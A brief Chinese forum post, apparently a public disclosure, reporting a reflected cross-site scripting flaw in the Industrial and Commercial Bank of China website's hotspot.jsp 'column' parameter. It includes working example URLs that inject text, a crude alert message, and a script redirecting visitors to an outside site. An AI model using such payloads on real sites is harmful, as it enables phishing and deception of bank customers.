表现在中国工商银行的网页对hotspot.jsp页面column函数的管理不善上,用户可以直接在中国工商银行的网页上写入文字,通过诱骗可能会使用户上当.因为前面的网址还是中国工商银行的官方网站 请点击以下连接查看: http://www.icbc.com.cn/news/hotspot.jsp?column=欢迎来到ch如果说这个网站存在问题,您相信么?
前几天牛人就发现 和建行那一样。 http://www.icbc.com.cn/news/hotspot.jsp?column=<script>alert('wc已经被amt强暴完毕');</script> http://www.icbc.com.cn/news/hotspot.jsp?column=<script>location.href='http://www.chinahtml.com';</script>